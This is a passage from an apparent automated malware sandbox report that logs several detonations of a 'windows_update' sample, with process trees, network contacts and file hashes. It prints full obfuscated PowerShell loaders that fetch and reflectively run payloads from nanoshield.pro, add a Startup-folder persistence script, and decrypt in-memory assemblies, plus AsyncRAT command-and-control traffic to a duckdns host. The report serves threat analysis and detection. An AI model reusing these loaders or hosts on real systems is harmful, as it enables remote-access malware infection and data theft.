| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mrz3l0qr.w4f.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5060-9-0x000001566BC20000-0x000001566BC42000-memory.dmp
memory/5060-19-0x00007FF893D60000-0x00007FF894821000-memory.dmp
memory/5060-20-0x000001566BCB0000-0x000001566BCC0000-memory.dmp
memory/5060-21-0x000001566BCB0000-0x000001566BCC0000-memory.dmp
memory/3828-22-0x00007FF893D60000-0x00007FF894821000-memory.dmp
memory/3828-23-0x000002882A830000-0x000002882A840000-memory.dmp
memory/3828-24-0x000002882A830000-0x000002882A840000-memory.dmp
memory/5060-25-0x000001566BCB0000-0x000001566BCC0000-memory.dmp
memory/3828-26-0x000002882A830000-0x000002882A840000-memory.dmp
memory/3828-27-0x0000028810710000-0x000002881075E000-memory.dmp
memory/4352-28-0x00007FF893D60000-0x00007FF894821000-memory.dmp
memory/4352-29-0x00000262503B0000-0x00000262503C0000-memory.dmp
memory/4352-39-0x00000262503B0000-0x00000262503C0000-memory.dmp
memory/4352-40-0x00000262503B0000-0x00000262503C0000-memory.dmp
memory/4352-47-0x00007FF893D60000-0x00007FF894821000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4f83e6b9df15851d271e8fbb8d137c9d |
| SHA1 | 52a44ba02fd59791f303362bbab53451ff48932e |
| SHA256 | d12625e429c0df81d4e9cc99d25d64e4c091c76992ef035fb9816a4b8a973fe0 |
| SHA512 | 4e67a88c08e1796d4c6717a757355ca03cdb9aa594527340e6bb873fee7f97cdd5012fe53064cfdae7d89417ab4d80c71b5acc0fe733acc2273063680198b68a |
memory/3828-51-0x00007FF893D60000-0x00007FF894821000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 235a8eb126d835efb2e253459ab8b089 |
| SHA1 | 293fbf68e6726a5a230c3a42624c01899e35a89f |
| SHA256 | 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686 |
| SHA512 | a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92 |
memory/5060-54-0x00007FF893D60000-0x00007FF894821000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 960 wrote to memory of 4360 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 960 wrote to memory of 4360 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4360 wrote to memory of 1876 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4360 wrote to memory of 1876 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1876 wrote to memory of 3800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1876 wrote to memory of 3800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\update.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.indabid/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs'"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.40.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 104.21.37.30:443 | nanoshield.pro | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 30.37.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4ewdpxzf.is3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4360-0-0x0000016898170000-0x0000016898192000-memory.dmp
memory/4360-10-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp
memory/4360-11-0x00000168967F0000-0x0000016896800000-memory.dmp
memory/4360-12-0x00000168967F0000-0x0000016896800000-memory.dmp
memory/1876-22-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp
memory/1876-24-0x0000019729180000-0x0000019729190000-memory.dmp
memory/1876-23-0x0000019729180000-0x0000019729190000-memory.dmp
memory/1876-25-0x0000019710B20000-0x0000019710B6E000-memory.dmp
memory/3800-35-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp
memory/3800-36-0x0000019D43030000-0x0000019D43040000-memory.dmp
memory/3800-43-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp
memory/1876-44-0x0000019729180000-0x0000019729190000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 48874fdc03476cb442d506f5bb796f70 |
| SHA1 | 2dedcc271d935fe842f7cb4cc03873b6f688d29d |
| SHA256 | 15717634eff02490a9e8a4606a3cc8d61876a9efa01b42d6c8bf442bcf8718e0 |
| SHA512 | 31b5539304c0ad1f781407a60ff019c30192b2fe3e7bd64bf7dc3d5a9263eae6874c8ef960998900d1322d358e38f9eadba40945958fb6ff7719cd1a24644671 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 10e624ec749193e3ec4e8e73e2d74ccd |
| SHA1 | a4200f61c224af1af1e58eec4c83623b2851729c |
| SHA256 | ee3ab03ec8e520c50ab249e06c76761e988a674ddc4fa4bf58cf7e66c8a099a1 |
| SHA512 | cae9adc6aaf954d1f999f3c6540c0a3060e74b80b5644118c1e87c37dd47e5576cf315b58d76c0cdeb95dc9cdfb2511763f7fa6873662c47c3f8e76c8602c481 |
memory/1876-48-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6c9d692ed2826ecb12c09356e69cc09 |
| SHA1 | def728a6138cf083d8a7c61337f3c9dade41a37f |
| SHA256 | a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b |
| SHA512 | 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3 |
memory/4360-51-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
122s
Max time network
128s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd';$MZYP='MadRzGindRzGModdRzGuldRzGedRzG'.Replace('dRzG', ''),'ChQdTpaQdTpngQdTpeEQdTpxteQdTpnsiQdTponQdTp'.Replace('QdTp', ''),'FGJZSroGJZSmBGJZSasGJZSeGJZS6GJZS4GJZSStrGJZSinGJZSgGJZS'.Replace('GJZS', ''),'GfsYwetfsYwCfsYwurfsYwrfsYwentfsYwProfsYwcefsYwssfsYw'.Replace('fsYw', ''),'ElPbFUePbFUmPbFUenPbFUtPbFUAtPbFU'.Replace('PbFU', ''),'InvEnKDoEnKDkeEnKD'.Replace('EnKD', ''),'Decnyejomnyejprnyejenyejssnyej'.Replace('nyej', ''),'LoaCsUjdCsUj'.Replace('CsUj', ''),'SXMnypliXMnytXMny'.Replace('XMny', ''),'ReYChsadYChsLinYChsesYChs'.Replace('YChs', ''),'TraTpWrnsTpWrfoTpWrrmTpWrFinTpWralTpWrBlTpWrockTpWr'.Replace('TpWr', ''),'CrjagKeajagKtjagKeDejagKcrjagKyjagKpjagKtorjagK'.Replace('jagK', ''),'EqqjYnqqjYtryqqjYPoiqqjYntqqjY'.Replace('qqjY', ''),'CCMrToCMrTpCMrTyToCMrT'.Replace('CMrT', '');powershell -w hidden;function lezXx($vAHtD){$fMpHn=[System.Security.Cryptography.Aes]::Create();$fMpHn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fMpHn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fMpHn.Key=[System.Convert]::($MZYP[2])('Vz0NaMXoskkNfAZDSYL9QEs4+Pg8xizh89PafV/0IEc=');$fMpHn.IV=[System.Convert]::($MZYP[2])('YYQFWZml9Xmr8vgNBAedtQ==');$LBVjX=$fMpHn.($MZYP[11])();$OrsvL=$LBVjX.($MZYP[10])($vAHtD,0,$vAHtD.Length);$LBVjX.Dispose();$fMpHn.Dispose();$OrsvL;}function UqmQx($vAHtD){$YXBBI=New-Object System.IO.MemoryStream(,$vAHtD);$DXQeR=New-Object System.IO.MemoryStream;$GSEpw=New-Object System.IO.Compression.GZipStream($YXBBI,[IO.Compression.CompressionMode]::($MZYP[6]));$GSEpw.($MZYP[13])($DXQeR);$GSEpw.Dispose();$YXBBI.Dispose();$DXQeR.Dispose();$DXQeR.ToArray();}$GbEwM=[System.IO.File]::($MZYP[9])([Console]::Title);$PQord=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 5).Substring(2))));$GigRn=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 6).Substring(2))));[System.Reflection.Assembly]::($MZYP[7])([byte[]]$GigRn).($MZYP[12]).($MZYP[5])($null,$null);[System.Reflection.Assembly]::($MZYP[7])([byte[]]$PQord).($MZYP[12]).($MZYP[5])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/2120-4-0x000000001B2E0000-0x000000001B5C2000-memory.dmp
memory/2120-5-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp
memory/2120-7-0x0000000002460000-0x0000000002468000-memory.dmp
memory/2120-8-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp
memory/2120-6-0x0000000002950000-0x00000000029D0000-memory.dmp
memory/2120-9-0x0000000002950000-0x00000000029D0000-memory.dmp
memory/2120-10-0x0000000002950000-0x00000000029D0000-memory.dmp
memory/2120-11-0x0000000002950000-0x00000000029D0000-memory.dmp
memory/2120-12-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp
memory/2120-13-0x0000000002950000-0x00000000029D0000-memory.dmp
memory/2120-14-0x0000000002950000-0x00000000029D0000-memory.dmp
memory/2120-15-0x0000000002950000-0x00000000029D0000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2232 wrote to memory of 2728 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2232 wrote to memory of 2728 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2232 wrote to memory of 2728 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2728 wrote to memory of 2388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2728 wrote to memory of 2388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2728 wrote to memory of 2388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.dkmmIhF/selif/orp.dleihsonan//:sptth', '1', 'Music'))}}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 104.21.37.30:443 | nanoshield.pro | tcp |
Files
memory/2728-4-0x000000001B590000-0x000000001B872000-memory.dmp
memory/2728-5-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp
memory/2728-7-0x0000000002C90000-0x0000000002D10000-memory.dmp
memory/2728-6-0x0000000001EA0000-0x0000000001EA8000-memory.dmp
memory/2728-8-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp
memory/2728-9-0x0000000002C90000-0x0000000002D10000-memory.dmp
memory/2728-10-0x0000000002C90000-0x0000000002D10000-memory.dmp
memory/2728-11-0x0000000002C90000-0x0000000002D10000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QIMO6ZYIYLL1WREG6CI1.temp
| MD5 | 8532661d6d819a85f21b22af4639a4ee |
| SHA1 | 27ea2be3ad7bc9deeccd32fb7e600d8cfe42a13d |
| SHA256 | 29391a67d6c631b21a16033c9d52e9ec0163800893423099d3b0ebb321a59341 |
| SHA512 | 0f0fd2af39d76c5f13618146e59955fbcb1a25e7c18c3d22ccb2aceb5668ded4c66286837f6aaa428cd27b96e1e6b8ad45cd074346eb5881240cb4ac630fb3ef |
memory/2388-17-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp
memory/2388-18-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2388-19-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp
memory/2388-21-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2388-20-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2388-22-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2388-23-0x0000000002CA0000-0x0000000002CEE000-memory.dmp
memory/2388-24-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp
memory/2728-25-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
145s
Max time network
154s
Command Line
Signatures
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3212 created 3428 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\file.ps1
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kdfsv.duckdns.org | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | kdfsv.duckdns.org | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | kdfsv.duckdns.org | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
Files
memory/3212-0-0x0000020434C20000-0x0000020434C42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vg4w4iwe.dma.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3212-10-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp
memory/3212-12-0x00000204186A0000-0x00000204186B0000-memory.dmp
memory/3212-13-0x00000204186A0000-0x00000204186B0000-memory.dmp
memory/3212-11-0x00000204186A0000-0x00000204186B0000-memory.dmp
memory/3212-14-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp
memory/3212-15-0x0000020419EF0000-0x0000020419F4B000-memory.dmp
memory/3212-17-0x00000204186A0000-0x00000204186B0000-memory.dmp
memory/3212-18-0x00000204347D0000-0x000002043482B000-memory.dmp
memory/3212-16-0x00000204186A0000-0x00000204186B0000-memory.dmp
memory/4904-19-0x0000029EE1770000-0x0000029EE1786000-memory.dmp
memory/4904-20-0x0000029EE32B0000-0x0000029EE32C6000-memory.dmp
memory/4904-21-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp
memory/4904-23-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp
memory/4904-22-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp
memory/4904-24-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp
memory/3212-27-0x00000204347D0000-0x000002043482B000-memory.dmp
memory/3212-28-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp
memory/4904-29-0x00007FFB56ED0000-0x00007FFB570C5000-memory.dmp
memory/4904-30-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp
memory/4904-31-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp
memory/4904-32-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp
memory/4904-33-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp
